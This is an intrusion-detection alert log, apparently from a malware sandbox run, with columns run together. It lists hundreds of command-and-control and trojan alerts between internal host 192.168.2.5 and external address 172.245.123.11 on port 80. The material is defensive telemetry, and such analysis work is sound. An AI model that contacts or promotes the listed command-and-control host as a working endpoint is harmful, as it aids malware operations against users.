                2025-01-07T11:03:08.806380+010020253811Malware Command and Control Activity Detected192.168.2.550081172.245.123.1180TCP
                2025-01-07T11:03:09.459976+010020253811Malware Command and Control Activity Detected192.168.2.550082172.245.123.1180TCP
                2025-01-07T11:03:10.132210+010020253811Malware Command and Control Activity Detected192.168.2.550083172.245.123.1180TCP
                2025-01-07T11:03:10.788630+010020253811Malware Command and Control Activity Detected192.168.2.550084172.245.123.1180TCP
                2025-01-07T11:03:11.460089+010020253811Malware Command and Control Activity Detected192.168.2.550085172.245.123.1180TCP
                2025-01-07T11:03:12.127099+010020253811Malware Command and Control Activity Detected192.168.2.550086172.245.123.1180TCP
                2025-01-07T11:03:12.756187+010020253811Malware Command and Control Activity Detected192.168.2.550087172.245.123.1180TCP
                2025-01-07T11:03:13.399253+010020253811Malware Command and Control Activity Detected192.168.2.550088172.245.123.1180TCP
                2025-01-07T11:03:14.117177+010020253811Malware Command and Control Activity Detected192.168.2.550089172.245.123.1180TCP
                2025-01-07T11:03:14.771734+010020253811Malware Command and Control Activity Detected192.168.2.550090172.245.123.1180TCP
                2025-01-07T11:03:15.503726+010020253811Malware Command and Control Activity Detected192.168.2.550091172.245.123.1180TCP
                2025-01-07T11:03:16.146706+010020253811Malware Command and Control Activity Detected192.168.2.550092172.245.123.1180TCP
                2025-01-07T11:03:16.829444+010020253811Malware Command and Control Activity Detected192.168.2.550093172.245.123.1180TCP
                2025-01-07T11:03:17.571531+010020253811Malware Command and Control Activity Detected192.168.2.550094172.245.123.1180TCP
                2025-01-07T11:03:18.224687+010020253811Malware Command and Control Activity Detected192.168.2.550095172.245.123.1180TCP
                2025-01-07T11:03:18.881699+010020253811Malware Command and Control Activity Detected192.168.2.550096172.245.123.1180TCP
                2025-01-07T11:03:19.523285+010020253811Malware Command and Control Activity Detected192.168.2.550097172.245.123.1180TCP
                2025-01-07T11:03:20.196458+010020253811Malware Command and Control Activity Detected192.168.2.550098172.245.123.1180TCP
                2025-01-07T11:03:20.851457+010020253811Malware Command and Control Activity Detected192.168.2.550099172.245.123.1180TCP
                2025-01-07T11:03:21.507813+010020253811Malware Command and Control Activity Detected192.168.2.550100172.245.123.1180TCP
                2025-01-07T11:03:22.176021+010020253811Malware Command and Control Activity Detected192.168.2.550101172.245.123.1180TCP
                2025-01-07T11:03:23.213434+010020253811Malware Command and Control Activity Detected192.168.2.550102172.245.123.1180TCP
                2025-01-07T11:03:24.151005+010020253811Malware Command and Control Activity Detected192.168.2.550103172.245.123.1180TCP
                2025-01-07T11:03:24.824519+010020253811Malware Command and Control Activity Detected192.168.2.550104172.245.123.1180TCP
                2025-01-07T11:03:26.710640+010020253811Malware Command and Control Activity Detected192.168.2.550105172.245.123.1180TCP
                2025-01-07T11:03:27.380300+010020253811Malware Command and Control Activity Detected192.168.2.550106172.245.123.1180TCP
                2025-01-07T11:03:28.015736+010020253811Malware Command and Control Activity Detected192.168.2.550107172.245.123.1180TCP
                2025-01-07T11:03:28.703037+010020253811Malware Command and Control Activity Detected192.168.2.550108172.245.123.1180TCP
                2025-01-07T11:03:29.349451+010020253811Malware Command and Control Activity Detected192.168.2.550109172.245.123.1180TCP
                2025-01-07T11:03:30.026092+010020253811Malware Command and Control Activity Detected192.168.2.550110172.245.123.1180TCP
                2025-01-07T11:03:30.701445+010020253811Malware Command and Control Activity Detected192.168.2.550111172.245.123.1180TCP
                2025-01-07T11:03:31.406580+010020253811Malware Command and Control Activity Detected192.168.2.550112172.245.123.1180TCP
                2025-01-07T11:03:32.067627+010020253811Malware Command and Control Activity Detected192.168.2.550113172.245.123.1180TCP
                2025-01-07T11:03:32.733953+010020253811Malware Command and Control Activity Detected192.168.2.550114172.245.123.1180TCP
                2025-01-07T11:03:33.433270+010020253811Malware Command and Control Activity Detected192.168.2.550115172.245.123.1180TCP
                2025-01-07T11:03:34.782674+010020253811Malware Command and Control Activity Detected192.168.2.550116172.245.123.1180TCP
                2025-01-07T11:03:35.422766+010020253811Malware Command and Control Activity Detected192.168.2.550117172.245.123.1180TCP
                2025-01-07T11:03:36.111250+010020253811Malware Command and Control Activity Detected192.168.2.550118172.245.123.1180TCP
                2025-01-07T11:03:36.787347+010020253811Malware Command and Control Activity Detected192.168.2.550119172.245.123.1180TCP
                2025-01-07T11:03:37.443278+010020253811Malware Command and Control Activity Detected192.168.2.550120172.245.123.1180TCP
                2025-01-07T11:03:38.078880+010020253811Malware Command and Control Activity Detected192.168.2.550121172.245.123.1180TCP
                2025-01-07T11:03:38.720674+010020253811Malware Command and Control Activity Detected192.168.2.550122172.245.123.1180TCP
                2025-01-07T11:03:39.392736+010020253811Malware Command and Control Activity Detected192.168.2.550123172.245.123.1180TCP
                2025-01-07T11:03:40.062714+010020253811Malware Command and Control Activity Detected192.168.2.550124172.245.123.1180TCP
                2025-01-07T11:03:40.725262+010020253811Malware Command and Control Activity Detected192.168.2.550125172.245.123.1180TCP
                2025-01-07T11:03:41.427015+010020253811Malware Command and Control Activity Detected192.168.2.550126172.245.123.1180TCP
                2025-01-07T11:03:42.077854+010020253811Malware Command and Control Activity Detected192.168.2.550127172.245.123.1180TCP
                2025-01-07T11:03:42.718228+010020253811Malware Command and Control Activity Detected192.168.2.550128172.245.123.1180TCP
                2025-01-07T11:03:43.373897+010020253811Malware Command and Control Activity Detected192.168.2.550129172.245.123.1180TCP
                2025-01-07T11:03:44.064476+010020253811Malware Command and Control Activity Detected192.168.2.550130172.245.123.1180TCP
                2025-01-07T11:03:44.703993+010020253811Malware Command and Control Activity Detected192.168.2.550131172.245.123.1180TCP
                2025-01-07T11:03:45.361356+010020253811Malware Command and Control Activity Detected192.168.2.550132172.245.123.1180TCP
                2025-01-07T11:03:46.021356+010020253811Malware Command and Control Activity Detected192.168.2.550133172.245.123.1180TCP
                2025-01-07T11:03:46.728055+010020253811Malware Command and Control Activity Detected192.168.2.550134172.245.123.1180TCP
                2025-01-07T11:03:47.390462+010020253811Malware Command and Control Activity Detected192.168.2.550135172.245.123.1180TCP
                2025-01-07T11:03:48.079188+010020253811Malware Command and Control Activity Detected192.168.2.550136172.245.123.1180TCP
                2025-01-07T11:03:48.750749+010020253811Malware Command and Control Activity Detected192.168.2.550137172.245.123.1180TCP
                2025-01-07T11:03:49.450939+010020253811Malware Command and Control Activity Detected192.168.2.550138172.245.123.1180TCP
                2025-01-07T11:03:50.093929+010020253811Malware Command and Control Activity Detected192.168.2.550139172.245.123.1180TCP
                2025-01-07T11:03:50.740699+010020253811Malware Command and Control Activity Detected192.168.2.550140172.245.123.1180TCP
                2025-01-07T11:03:51.391659+010020253811Malware Command and Control Activity Detected192.168.2.550141172.245.123.1180TCP
                2025-01-07T11:03:52.063134+010020253811Malware Command and Control Activity Detected192.168.2.550142172.245.123.1180TCP
                2025-01-07T11:03:52.739569+010020253811Malware Command and Control Activity Detected192.168.2.550143172.245.123.1180TCP
                2025-01-07T11:03:53.390870+010020253811Malware Command and Control Activity Detected192.168.2.550144172.245.123.1180TCP
                2025-01-07T11:03:54.062572+010020253811Malware Command and Control Activity Detected192.168.2.550145172.245.123.1180TCP
                2025-01-07T11:03:54.718933+010020253811Malware Command and Control Activity Detected192.168.2.550146172.245.123.1180TCP
                2025-01-07T11:03:55.375592+010020253811Malware Command and Control Activity Detected192.168.2.550147172.245.123.1180TCP
                2025-01-07T11:03:56.016359+010020253811Malware Command and Control Activity Detected192.168.2.550148172.245.123.1180TCP
                2025-01-07T11:03:56.672622+010020253811Malware Command and Control Activity Detected192.168.2.550149172.245.123.1180TCP
                2025-01-07T11:03:57.344266+010020253811Malware Command and Control Activity Detected192.168.2.550150172.245.123.1180TCP
                2025-01-07T11:03:58.028337+010020253811Malware Command and Control Activity Detected192.168.2.550151172.245.123.1180TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-01-07T11:01:59.172328+010020254831A Network Trojan was detected172.245.123.1180192.168.2.549708TCP
                2025-01-07T11:01:59.826461+010020254831A Network Trojan was detected172.245.123.1180192.168.2.549709TCP
                2025-01-07T11:02:00.495096+010020254831A Network Trojan was detected172.245.123.1180192.168.2.549710TCP
                2025-01-07T11:02:01.192750+010020254831A Network Trojan was detected172.245.123.1180192.168.2.549711TCP
                2025-01-07T11:02:01.907960+010020254831A Network Trojan was detected172.245.123.1180192.168.2.549712TCP
                2025-01-07T11:02:02.638895+010020254831A Network Trojan was detected172.245.123.1180192.168.2.549714TCP
                2025-01-07T11:02:03.325869+010020254831A Network Trojan was detected172.245.123.1180192.168.2.549715TCP
                2025-01-07T11:02:04.088778+010020254831A Network Trojan was detected172.245.123.1180192.168.2.549716TCP
                2025-01-07T11:02:04.776954+010020254831A Network Trojan was detected172.245.123.1180192.168.2.549717TCP
                2025-01-07T11:02:05.483351+010020254831A Network Trojan was detected172.245.123.1180192.168.2.549718TCP
                2025-01-07T11:02:06.199216+010020254831A Network Trojan was detected172.245.123.1180192.168.2.549719TCP
                2025-01-07T11:02:06.949892+010020254831A Network Trojan was detected172.245.123.1180192.168.2.549720TCP
                2025-01-07T11:02:07.698697+010020254831A Network Trojan was detected172.245.123.1180192.168.2.549721TCP
                2025-01-07T11:02:08.376604+010020254831A Network Trojan was detected172.245.123.1180192.168.2.549722TCP
                2025-01-07T11:02:09.048487+010020254831A Network Trojan was detected172.245.123.1180192.168.2.549723TCP
                2025-01-07T11:02:09.690347+010020254831A Network Trojan was detected172.245.123.1180192.168.2.549724TCP
                2025-01-07T11:02:10.376291+010020254831A Network Trojan was detected172.245.123.1180192.168.2.549725TCP
                2025-01-07T11:02:11.080304+010020254831A Network Trojan was detected172.245.123.1180192.168.2.549727TCP
                2025-01-07T11:02:11.744334+010020254831A Network Trojan was detected172.245.123.1180192.168.2.549730TCP
                2025-01-07T11:02:12.471383+010020254831A Network Trojan was detected172.245.123.1180192.168.2.549732TCP
                2025-01-07T11:02:13.119052+010020254831A Network Trojan was detected172.245.123.1180192.168.2.549734TCP
                2025-01-07T11:02:13.758672+010020254831A Network Trojan was detected172.245.123.1180192.168.2.549736TCP
                2025-01-07T11:02:14.425478+010020254831A Network Trojan was detected172.245.123.1180192.168.2.549738TCP
                2025-01-07T11:02:15.088894+010020254831A Network Trojan was detected172.245.123.1180192.168.2.549739TCP
                2025-01-07T11:02:15.752303+010020254831A Network Trojan was detected172.245.123.1180192.168.2.549740TCP
                2025-01-07T11:02:16.412071+010020254831A Network Trojan was detected172.245.123.1180192.168.2.549741TCP
                2025-01-07T11:02:17.074803+010020254831A Network Trojan was detected172.245.123.1180192.168.2.549742TCP
                2025-01-07T11:02:17.799464+010020254831A Network Trojan was detected172.245.123.1180192.168.2.549748TCP
                2025-01-07T11:02:18.483475+010020254831A Network Trojan was detected172.245.123.1180192.168.2.549754TCP
                2025-01-07T11:02:19.162697+010020254831A Network Trojan was detected172.245.123.1180192.168.2.549760TCP
                2025-01-07T11:02:19.856728+010020254831A Network Trojan was detected172.245.123.1180192.168.2.549766TCP
                2025-01-07T11:02:20.569615+010020254831A Network Trojan was detected172.245.123.1180192.168.2.549772TCP
                2025-01-07T11:02:21.272044+010020254831A Network Trojan was detected172.245.123.1180192.168.2.549778TCP
                2025-01-07T11:02:21.954458+010020254831A Network Trojan was detected172.245.123.1180192.168.2.549784TCP
                2025-01-07T11:02:22.616022+010020254831A Network Trojan was detected172.245.123.1180192.168.2.549790TCP
                2025-01-07T11:02:23.331357+010020254831A Network Trojan was detected172.245.123.1180192.168.2.549795TCP
                2025-01-07T11:02:24.064050+010020254831A Network Trojan was detected172.245.123.1180192.168.2.549801TCP
                2025-01-07T11:02:24.766691+010020254831A Network Trojan was detected172.245.123.1180192.168.2.549804TCP
                2025-01-07T11:02:25.495830+010020254831A Network Trojan was detected172.245.123.1180192.168.2.549810TCP
                2025-01-07T11:02:26.182034+010020254831A Network Trojan was detected172.245.123.1180192.168.2.549815TCP
                2025-01-07T11:02:26.940462+010020254831A Network Trojan was detected172.245.123.1180192.168.2.549821TCP
                2025-01-07T11:02:27.641073+010020254831A Network Trojan was detected172.245.123.1180192.168.2.549828TCP
                2025-01-07T11:02:28.470446+010020254831A Network Trojan was detected172.245.123.1180192.168.2.549834TCP
                2025-01-07T11:02:29.132414+010020254831A Network Trojan was detected172.245.123.1180192.168.2.549839TCP
                2025-01-07T11:02:29.819607+010020254831A Network Trojan was detected172.245.123.1180192.168.2.549843TCP
                2025-01-07T11:02:30.599583+010020254831A Network Trojan was detected172.245.123.1180192.168.2.549849TCP
                2025-01-07T11:02:31.280966+010020254831A Network Trojan was detected172.245.123.1180192.168.2.549854TCP
                2025-01-07T11:02:31.972261+010020254831A Network Trojan was detected172.245.123.1180192.168.2.549860TCP
                2025-01-07T11:02:32.650889+010020254831A Network Trojan was detected172.245.123.1180192.168.2.549865TCP
                2025-01-07T11:02:33.623252+010020254831A Network Trojan was detected172.245.123.1180192.168.2.549872TCP
                2025-01-07T11:02:34.286606+010020254831A Network Trojan was detected172.245.123.1180192.168.2.549877TCP
                2025-01-07T11:02:35.008395+010020254831A Network Trojan was detected172.245.123.1180192.168.2.549883TCP
                2025-01-07T11:02:35.674272+010020254831A Network Trojan was detected172.245.123.1180192.168.2.549889TCP
                2025-01-07T11:02:36.336073+010020254831A Network Trojan was detected172.245.123.1180192.168.2.549895TCP
                2025-01-07T11:02:36.981365+010020254831A Network Trojan was detected172.245.123.1180192.168.2.549901TCP
                2025-01-07T11:02:37.637059+010020254831A Network Trojan was detected172.245.123.1180192.168.2.549907TCP
                2025-01-07T11:02:38.445345+010020254831A Network Trojan was detected172.245.123.1180192.168.2.549912TCP
                2025-01-07T11:02:39.109905+010020254831A Network Trojan was detected172.245.123.1180192.168.2.549915TCP
                2025-01-07T11:02:39.776713+010020254831A Network Trojan was detected172.245.123.1180192.168.2.549920TCP
                2025-01-07T11:02:40.452674+010020254831A Network Trojan was detected172.245.123.1180192.168.2.549926TCP
                2025-01-07T11:02:41.138836+010020254831A Network Trojan was detected172.245.123.1180192.168.2.549932TCP
                2025-01-07T11:02:41.803936+010020254831A Network Trojan was detected172.245.123.1180192.168.2.549934TCP
                2025-01-07T11:02:42.465580+010020254831A Network Trojan was detected172.245.123.1180192.168.2.549940TCP
                2025-01-07T11:02:43.151462+010020254831A Network Trojan was detected172.245.123.1180192.168.2.549946TCP
                2025-01-07T11:02:43.857197+010020254831A Network Trojan was detected172.245.123.1180192.168.2.549952TCP
                2025-01-07T11:02:44.522405+010020254831A Network Trojan was detected172.245.123.1180192.168.2.549958TCP
                2025-01-07T11:02:45.355010+010020254831A Network Trojan was detected172.245.123.1180192.168.2.549964TCP
                2025-01-07T11:02:46.030084+010020254831A Network Trojan was detected172.245.123.1180192.168.2.549969TCP
                2025-01-07T11:02:46.699686+010020254831A Network Trojan was detected172.245.123.1180192.168.2.549971TCP
                2025-01-07T11:02:47.381254+010020254831A Network Trojan was detected172.245.123.1180192.168.2.549976TCP
                2025-01-07T11:02:48.298557+010020254831A Network Trojan was detected172.245.123.1180192.168.2.549982TCP
                2025-01-07T11:02:49.006487+010020254831A Network Trojan was detected172.245.123.1180192.168.2.549987TCP
                2025-01-07T11:02:49.647518+010020254831A Network Trojan was detected172.245.123.1180192.168.2.549994TCP
                2025-01-07T11:02:50.336299+010020254831A Network Trojan was detected172.245.123.1180192.168.2.550000TCP
                2025-01-07T11:02:51.071482+010020254831A Network Trojan was detected172.245.123.1180192.168.2.550006TCP
                2025-01-07T11:02:51.758585+010020254831A Network Trojan was detected172.245.123.1180192.168.2.550009TCP
                2025-01-07T11:02:52.460410+010020254831A Network Trojan was detected172.245.123.1180192.168.2.550015TCP
                2025-01-07T11:02:53.129904+010020254831A Network Trojan was detected172.245.123.1180192.168.2.550020TCP
                2025-01-07T11:02:53.782384+010020254831A Network Trojan was detected172.245.123.1180192.168.2.550026TCP
                2025-01-07T11:02:54.695350+010020254831A Network Trojan was detected172.245.123.1180192.168.2.550032TCP
                2025-01-07T11:02:55.675259+010020254831A Network Trojan was detected172.245.123.1180192.168.2.550038TCP
                2025-01-07T11:02:56.386259+010020254831A Network Trojan was detected172.245.123.1180192.168.2.550044TCP
                2025-01-07T11:02:57.059724+010020254831A Network Trojan was detected172.245.123.1180192.168.2.550050TCP
                2025-01-07T11:02:57.747262+010020254831A Network Trojan was detected172.245.123.1180192.168.2.550055TCP
                2025-01-07T11:02:58.413629+010020254831A Network Trojan was detected172.245.123.1180192.168.2.550061TCP
                2025-01-07T11:02:59.073850+010020254831A Network Trojan was detected172.245.123.1180192.168.2.550066TCP
                2025-01-07T11:02:59.744118+010020254831A Network Trojan was detected172.245.123.1180192.168.2.550067TCP
                2025-01-07T11:03:00.408286+010020254831A Network Trojan was detected172.245.123.1180192.168.2.550068TCP
                2025-01-07T11:03:01.060718+010020254831A Network Trojan was detected172.245.123.1180192.168.2.550069TCP
                2025-01-07T11:03:01.746358+010020254831A Network Trojan was detected172.245.123.1180192.168.2.550070TCP
                2025-01-07T11:03:02.419565+010020254831A Network Trojan was detected172.245.123.1180192.168.2.550071TCP
                2025-01-07T11:03:03.192775+010020254831A Network Trojan was detected172.245.123.1180192.168.2.550072TCP
                2025-01-07T11:03:03.866629+010020254831A Network Trojan was detected172.245.123.1180192.168.2.550073TCP
                2025-01-07T11:03:04.533080+010020254831A Network Trojan was detected172.245.123.1180192.168.2.550074TCP
                2025-01-07T11:03:05.175810+010020254831A Network Trojan was detected172.245.123.1180192.168.2.550075TCP
                2025-01-07T11:03:05.822165+010020254831A Network Trojan was detected172.245.123.1180192.168.2.550076TCP
                2025-01-07T11:03:06.488803+010020254831A Network Trojan was detected172.245.123.1180192.168.2.550077TCP
                2025-01-07T11:03:07.165978+010020254831A Network Trojan was detected172.245.123.1180192.168.2.550078TCP
                2025-01-07T11:03:07.991205+010020254831A Network Trojan was detected172.245.123.1180192.168.2.550079TCP
                2025-01-07T11:03:08.660237+010020254831A Network Trojan was detected172.245.123.1180192.168.2.550080TCP
                2025-01-07T11:03:09.310820+010020254831A Network Trojan was detected172.245.123.1180192.168.2.550081TCP
                2025-01-07T11:03:09.979775+010020254831A Network Trojan was detected172.245.123.1180192.168.2.550082TCP
                2025-01-07T11:03:10.638618+010020254831A Network Trojan was detected172.245.123.1180192.168.2.550083TCP
                2025-01-07T11:03:11.312316+010020254831A Network Trojan was detected172.245.123.1180192.168.2.550084TCP
                2025-01-07T11:03:11.962187+010020254831A Network Trojan was detected172.245.123.1180192.168.2.550085TCP
                2025-01-07T11:03:12.618552+010020254831A Network Trojan was detected172.245.123.1180192.168.2.550086TCP
                2025-01-07T11:03:13.259632+010020254831A Network Trojan was detected172.245.123.1180192.168.2.550087TCP
                2025-01-07T11:03:13.969885+010020254831A Network Trojan was detected172.245.123.1180192.168.2.550088TCP
                2025-01-07T11:03:14.627975+010020254831A Network Trojan was detected172.245.123.1180192.168.2.550089TCP
                2025-01-07T11:03:15.287870+010020254831A Network Trojan was detected172.245.123.1180192.168.2.550090TCP
                2025-01-07T11:03:16.010889+010020254831A Network Trojan was detected172.245.123.1180192.168.2.550091TCP
                2025-01-07T11:03:16.665102+010020254831A Network Trojan was detected172.245.123.1180192.168.2.550092TCP
                2025-01-07T11:03:17.422734+010020254831A Network Trojan was detected172.245.123.1180192.168.2.550093TCP
                2025-01-07T11:03:18.076057+010020254831A Network Trojan was detected172.245.123.1180192.168.2.550094TCP
                2025-01-07T11:03:18.735502+010020254831A Network Trojan was detected172.245.123.1180192.168.2.550095TCP
                2025-01-07T11:03:19.380219+010020254831A Network Trojan was detected172.245.123.1180192.168.2.550096TCP
                2025-01-07T11:03:20.048644+010020254831A Network Trojan was detected172.245.123.1180192.168.2.550097TCP
                2025-01-07T11:03:20.707633+010020254831A Network Trojan was detected172.245.123.1180192.168.2.550098TCP
                2025-01-07T11:03:21.363986+010020254831A Network Trojan was detected172.245.123.1180192.168.2.550099TCP
                2025-01-07T11:03:22.002829+010020254831A Network Trojan was detected172.245.123.1180192.168.2.550100TCP
                2025-01-07T11:03:23.056926+010020254831A Network Trojan was detected172.245.123.1180192.168.2.550101TCP
                2025-01-07T11:03:24.002501+010020254831A Network Trojan was detected172.245.123.1180192.168.2.550102TCP
                2025-01-07T11:03:24.677650+010020254831A Network Trojan was detected172.245.123.1180192.168.2.550103TCP
                2025-01-07T11:03:26.572830+010020254831A Network Trojan was detected172.245.123.1180192.168.2.550104TCP
                2025-01-07T11:03:27.233439+010020254831A Network Trojan was detected172.245.123.1180192.168.2.550105TCP
                2025-01-07T11:03:27.885439+010020254831A Network Trojan was detected172.245.123.1180192.168.2.550106TCP
                2025-01-07T11:03:28.538369+010020254831A Network Trojan was detected172.245.123.1180192.168.2.550107TCP
                2025-01-07T11:03:29.211601+010020254831A Network Trojan was detected172.245.123.1180192.168.2.550108TCP
                2025-01-07T11:03:29.879303+010020254831A Network Trojan was detected172.245.123.1180192.168.2.550109TCP
                2025-01-07T11:03:30.549655+010020254831A Network Trojan was detected172.245.123.1180192.168.2.550110TCP
                2025-01-07T11:03:31.244883+010020254831A Network Trojan was detected172.245.123.1180192.168.2.550111TCP
                2025-01-07T11:03:31.931632+010020254831A Network Trojan was detected172.245.123.1180192.168.2.550112TCP
                2025-01-07T11:03:32.590737+010020254831A Network Trojan was detected172.245.123.1180192.168.2.550113TCP
                2025-01-07T11:03:33.260811+010020254831A Network Trojan was detected172.245.123.1180192.168.2.550114TCP
                2025-01-07T11:03:34.641210+010020254831A Network Trojan was detected172.245.123.1180192.168.2.550115TCP
                2025-01-07T11:03:35.289758+010020254831A Network Trojan was detected172.245.123.1180192.168.2.550116TCP
                2025-01-07T11:03:35.973094+010020254831A Network Trojan was detected172.245.123.1180192.168.2.550117TCP
                2025-01-07T11:03:36.637436+010020254831A Network Trojan was detected172.245.123.1180192.168.2.550118TCP
                2025-01-07T11:03:37.301961+010020254831A Network Trojan was detected172.245.123.1180192.168.2.550119TCP
                2025-01-07T11:03:37.940683+010020254831A Network Trojan was detected172.245.123.1180192.168.2.550120TCP
                2025-01-07T11:03:38.582642+010020254831A Network Trojan was detected172.245.123.1180192.168.2.550121TCP
                2025-01-07T11:03:39.253953+010020254831A Network Trojan was detected172.245.123.1180192.168.2.550122TCP
                2025-01-07T11:03:39.918492+010020254831A Network Trojan was detected172.245.123.1180192.168.2.550123TCP
                2025-01-07T11:03:40.577698+010020254831A Network Trojan was detected172.245.123.1180192.168.2.550124TCP
                2025-01-07T11:03:41.232579+010020254831A Network Trojan was detected172.245.123.1180192.168.2.550125TCP
                2025-01-07T11:03:41.945929+010020254831A Network Trojan was detected172.245.123.1180192.168.2.550126TCP
                2025-01-07T11:03:42.586998+010020254831A Network Trojan was detected172.245.123.1180192.168.2.550127TCP
                2025-01-07T11:03:43.230824+010020254831A Network Trojan was detected172.245.123.1180192.168.2.550128TCP
                2025-01-07T11:03:43.889105+010020254831A Network Trojan was detected172.245.123.1180192.168.2.550129TCP
                2025-01-07T11:03:44.570674+010020254831A Network Trojan was detected172.245.123.1180192.168.2.550130TCP
                2025-01-07T11:03:45.219660+010020254831A Network Trojan was detected172.245.123.1180192.168.2.550131TCP
                2025-01-07T11:03:45.873803+010020254831A Network Trojan was detected172.245.123.1180192.168.2.550132TCP
                2025-01-07T11:03:46.515917+010020254831A Network Trojan was detected172.245.123.1180192.168.2.550133TCP
                2025-01-07T11:03:47.258469+010020254831A Network Trojan was detected172.245.123.1180192.168.2.550134TCP
                2025-01-07T11:03:47.940076+010020254831A Network Trojan was detected172.245.123.1180192.168.2.550135TCP
                2025-01-07T11:03:48.604851+010020254831A Network Trojan was detected172.245.123.1180192.168.2.550136TCP
                2025-01-07T11:03:49.306405+010020254831A Network Trojan was detected172.245.123.1180192.168.2.550137TCP
                2025-01-07T11:03:49.953044+010020254831A Network Trojan was detected172.245.123.1180192.168.2.550138TCP
                2025-01-07T11:03:50.596016+010020254831A Network Trojan was detected172.245.123.1180192.168.2.550139TCP
                2025-01-07T11:03:51.252940+010020254831A Network Trojan was detected172.245.123.1180192.168.2.550140TCP
                2025-01-07T11:03:51.922271+010020254831A Network Trojan was detected172.245.123.1180192.168.2.550141TCP
                2025-01-07T11:03:52.591821+010020254831A Network Trojan was detected172.245.123.1180192.168.2.550142TCP
                2025-01-07T11:03:53.254375+010020254831A Network Trojan was detected172.245.123.1180192.168.2.550143TCP
                2025-01-07T11:03:53.917994+010020254831A Network Trojan was detected172.245.123.1180192.168.2.550144TCP
                2025-01-07T11:03:54.588580+010020254831A Network Trojan was detected172.245.123.1180192.168.2.550145TCP
                2025-01-07T11:03:55.236778+010020254831A Network Trojan was detected172.245.123.1180192.168.2.550146TCP
                2025-01-07T11:03:55.875955+010020254831A Network Trojan was detected172.245.123.1180192.168.2.550147TCP
                2025-01-07T11:03:56.533027+010020254831A Network Trojan was detected172.245.123.1180192.168.2.550148TCP
                2025-01-07T11:03:57.201332+010020254831A Network Trojan was detected172.245.123.1180192.168.2.550149TCP
                2025-01-07T11:03:57.865551+010020254831A Network Trojan was detected172.245.123.1180192.168.2.550150TCP
                2025-01-07T11:03:58.565391+010020254831A Network Trojan was detected172.245.123.1180192.168.2.550151TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-01-07T11:01:58.458090+010020243131Malware Command and Control Activity Detected192.168.2.549706172.245.123.1180TCP
                2025-01-07T11:01:59.167458+010020243131Malware Command and Control Activity Detected192.168.2.549708172.245.123.1180TCP
                2025-01-07T11:01:59.826437+010020243131Malware Command and Control Activity Detected192.168.2.549709172.245.123.1180TCP
                2025-01-07T11:02:00.489975+010020243131Malware Command and Control Activity Detected192.168.2.549710172.245.123.1180TCP
                2025-01-07T11:02:01.182301+010020243131Malware Command and Control Activity Detected192.168.2.549711172.245.123.1180TCP
                2025-01-07T11:02:01.907867+010020243131Malware Command and Control Activity Detected192.168.2.549712172.245.123.1180TCP
                2025-01-07T11:02:02.634049+010020243131Malware Command and Control Activity Detected192.168.2.549714172.245.123.1180TCP
                2025-01-07T11:02:03.321041+010020243131Malware Command and Control Activity Detected192.168.2.549715172.245.123.1180TCP
                2025-01-07T11:02:04.082310+010020243131Malware Command and Control Activity Detected192.168.2.549716172.245.123.1180TCP
                2025-01-07T11:02:04.772127+010020243131Malware Command and Control Activity Detected192.168.2.549717172.245.123.1180TCP
                2025-01-07T11:02:05.483094+010020243131Malware Command and Control Activity Detected192.168.2.549718172.245.123.1180TCP
                2025-01-07T11:02:06.191450+010020243131Malware Command and Control Activity Detected192.168.2.549719172.245.123.1180TCP
                2025-01-07T11:02:06.944182+010020243131Malware Command and Control Activity Detected192.168.2.549720172.245.123.1180TCP
                2025-01-07T11:02:07.693898+010020243131Malware Command and Control Activity Detected192.168.2.549721172.245.123.1180TCP
                2025-01-07T11:02:08.371774+010020243131Malware Command and Control Activity Detected192.168.2.549722172.245.123.1180TCP
                2025-01-07T11:02:09.043689+010020243131Malware Command and Control Activity Detected192.168.2.549723172.245.123.1180TCP
                2025-01-07T11:02:09.690323+010020243131Malware Command and Control Activity Detected192.168.2.549724172.245.123.1180TCP
                2025-01-07T11:02:10.371491+010020243131Malware Command and Control Activity Detected192.168.2.549725172.245.123.1180TCP
                2025-01-07T11:02:11.080195+010020243131Malware Command and Control Activity Detected192.168.2.549727172.245.123.1180TCP
                2025-01-07T11:02:11.739564+010020243131Malware Command and Control Activity Detected192.168.2.549730172.245.123.1180TCP
                2025-01-07T11:02:12.466482+010020243131Malware Command and Control Activity Detected192.168.2.549732172.245.123.1180TCP
                2025-01-07T11:02:13.113940+010020243131Malware Command and Control Activity Detected192.168.2.549734172.245.123.1180TCP
                2025-01-07T11:02:13.753938+010020243131Malware Command and Control Activity Detected192.168.2.549736172.245.123.1180TCP
                2025-01-07T11:02:14.420666+010020243131Malware Command and Control Activity Detected192.168.2.549738172.245.123.1180TCP
                2025-01-07T11:02:15.079219+010020243131Malware Command and Control Activity Detected192.168.2.549739172.245.123.1180TCP
                2025-01-07T11:02:15.751764+010020243131Malware Command and Control Activity Detected192.168.2.549740172.245.123.1180TCP
                2025-01-07T11:02:16.407319+010020243131Malware Command and Control Activity Detected192.168.2.549741172.245.123.1180TCP
                2025-01-07T11:02:17.070038+010020243131Malware Command and Control Activity Detected192.168.2.549742172.245.123.1180TCP
                2025-01-07T11:02:17.794738+010020243131Malware Command and Control Activity Detected192.168.2.549748172.245.123.1180TCP
                2025-01-07T11:02:18.478664+010020243131Malware Command and Control Activity Detected192.168.2.549754172.245.123.1180TCP
                2025-01-07T11:02:19.157102+010020243131Malware Command and Control Activity Detected192.168.2.549760172.245.123.1180TCP
                2025-01-07T11:02:19.851955+010020243131Malware Command and Control Activity Detected192.168.2.549766172.245.123.1180TCP
                2025-01-07T11:02:20.564861+010020243131Malware Command and Control Activity Detected192.168.2.549772172.245.123.1180TCP
                2025-01-07T11:02:21.267286+010020243131Malware Command and Control Activity Detected192.168.2.549778172.245.123.1180TCP
                2025-01-07T11:02:21.949590+010020243131Malware Command and Control Activity Detected192.168.2.549784172.245.123.1180TCP
                2025-01-07T11:02:22.615903+010020243131Malware Command and Control Activity Detected192.168.2.549790172.245.123.1180TCP
                2025-01-07T11:02:23.331353+010020243131Malware Command and Control Activity Detected192.168.2.549795172.245.123.1180TCP
                2025-01-07T11:02:24.058134+010020243131Malware Command and Control Activity Detected192.168.2.549801172.245.123.1180TCP
                2025-01-07T11:02:24.758689+010020243131Malware Command and Control Activity Detected192.168.2.549804172.245.123.1180TCP
                2025-01-07T11:02:25.495647+010020243131Malware Command and Control Activity Detected192.168.2.549810172.245.123.1180TCP
                2025-01-07T11:02:26.182014+010020243131Malware Command and Control Activity Detected192.168.2.549815172.245.123.1180TCP
